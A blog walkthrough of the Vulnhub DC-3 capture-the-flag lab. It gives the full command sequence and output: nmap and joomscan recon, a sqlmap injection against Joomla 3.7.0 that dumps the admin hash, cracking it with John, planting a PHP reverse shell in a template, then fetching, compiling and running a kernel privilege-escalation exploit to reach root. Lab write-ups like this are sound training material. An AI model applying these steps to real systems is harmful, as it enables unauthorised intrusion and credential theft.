Walkthrough: Vulnhub - DC: 3

· by Christoph Stoettner · Read in about 8 min · (1589 words)

TL;DR

Download and Informations
Original Description

DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).

If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

Recon

nmap
root@kali:~/vulnhub/dc3# nmap -sn 10.128.1.150-200
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST
Nmap scan report for DC3VM.stoeps.lab (10.128.1.156)
Host is up (0.00095s latency).
MAC Address: 00:0C:29:7F:2F:B8 (VMware)

root@kali:~/vulnhub/dc3# nmap -A -p- 10.128.1.156
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST
Nmap scan report for DC3VM.stoeps.lab (10.128.1.156)
Host is up (0.0011s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:7F:2F:B8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.12 ms DC3VM.stoeps.lab (10.128.1.156)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds

A short check with the browser shows us a Joomla webpage. Let’s check version and possible attacks.

joomscan
root@kali:~/vulnhub/dc3# apt install joomscan

root@kali:~/vulnhub/dc3# joomscan -u http://10.128.1.156

    ____  _____  _____  __  __  ___   ___    __    _  _
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  (
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)

    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://10.128.1.156 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://10.128.1.156/administrator/components
http://10.128.1.156/administrator/modules
http://10.128.1.156/administrator/templates
http://10.128.1.156/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://10.128.1.156/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

Your Report : reports/10.128.1.156/

Not that detailed like with wpscan, but enough infos for now. We know it’s Joomla 3.7.

searchsploit
root@kali:~/vulnhub/dc3# searchsploit joomla 3.7
----------------------------------------------------- ----------------------------------------
 Exploit Title                                       |  Path
                                                     | (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
Joomla! 3.7 - SQL Injection                          | exploits/php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection           | exploits/php/webapps/42033.txt

The file 42033.txt tells us, that a call is vulnerable for sqlmap.

42033.txt
...
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
  --dbs -p list[fullordering]
...

Attack Joomla

SQLMAP

Get databases
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
  -p list[fullordering] --dbs

...
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
...
Get tables
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
  -p list[fullordering] -D joomladb --tables

...
Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| ...                 |
| #__usergroups       |
| #__users            | (1)
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+
...
1the user table
Dump table
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
  -p list[fullordering] -D joomladb -T \#__users --dump

...
[14:39:05] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
[14:39:05] [INFO] fetching entries for table '#__users' in database 'joomladb'
[14:39:05] [INFO] used SQL query returns 1 entry
[14:39:05] [INFO] resumed: '0'
[14:39:05] [INFO] resumed: '0'
[14:39:05] [INFO] resumed: 'freddy@norealaddress.net'
[14:39:05] [INFO] resumed: '629'
[14:39:05] [INFO] resumed: '2019-04-01 20:27:08'
[14:39:05] [INFO] resumed: 'admin'      (1)
[14:39:05] [INFO] resumed: '{"admin_style":"","admin_language":"","language":"","editor":""...
[14:39:05] [INFO] resumed: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' (2)
[14:39:05] [INFO] resumed: '2019-03-23 09:44:38'
[14:39:05] [INFO] resumed: '1'
[14:39:05] [INFO] resumed: 'admin'
Database: joomladb
Table: #__users
[1 entry]
1Username
2Hash

I put user and hash into a textfile user.

user
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

And run john the ripper on the file.

root@kali:~/vulnhub/dc3# john user
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single

...

Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy           (admin)      (1)
1g 0:00:00:08 DONE 2/3 (2020-01-06 14:03) 0.1226g/s 108.5p/s 108.5c/s 108.5C/s 123456..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root@kali:~/vulnhub/dc3# john --show user
admin:snoopy    (2)

1 password hash cracked, 0 left
1got the password
2Joomla login credentials

Remote Shell

Login to Joomla and go to Extension  Templates. Replace the index.php of the actual template with the code from /usr/share/webshells/php/php-reverse-shell.php. Just change the ip for netcat.

Now run nc -nlvp 1234 on Kali and open the Joomla page again.

python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@DC3VM:/tmp$ uname -a
Linux DC3VM 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

www-data@DC3VM:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial

Exploit and root flag

I searched for sudoer, sticky bit binaries and other stuff to get root. Finally I decided to use a kernel exploit.

searchsploit
root@kali:~/vulnhub/dc3# searchsploit ubuntu 16.04
----------------------------------------------------------------------------------------------------------------------- --------------------------------------
 Exploit Title                                                                                                         |  Path
                                                                                                                       | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------- --------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution                                                       | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                                                          | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download   | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation                                              | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Sta | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privile | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps                                                  | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read                              | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                        | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak                                     | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                       | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation                  | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation         | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                           | exploits/linux/local/39772.txt (1)
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation                                 | exploits/linux/local/40489.txt
1This one finally worked

DC-3 is a 32 bit machine, so we can save time and leave the 64 bit exploits.

Compile and run exploit
www-data@DC3VM:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

Saving to: '39772.zip'

39772.zip           100%[===================>]   6.86K  --.-KB/s    in 0.001s

2020-01-07 07:07:00 (11.2 MB/s) - '39772.zip' saved [7025/7025]

www-data@DC3VM:/tmp$ unzip 39772.zip

www-data@DC3VM:/tmp$ cd 39772
www-data@DC3VM:/tmp/39772$ ls
crasher.tar  exploit.tar

www-data@DC3VM:/tmp/39772$ tar -xvf exploit.tar
www-data@DC3VM:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput.c  hello.c  suidhelper.c

www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ sh compile.sh   (1)

doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c

www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput

starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...

root@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC3VM:/root# ls
ls
the-flag.txt
1Compile throws two warnings, but the exploit works

The flag

root@DC3VM:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order for completing DC-3VM.  :-)

I hope you've enjoyed this challenge as much as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

Final thoughts

This time we had to use sqlmap for the first steps. First time without additional flags like in DC-1 and DC-2.

Thanks to @DCAU7! Seeing forward to the other machines in the DC Series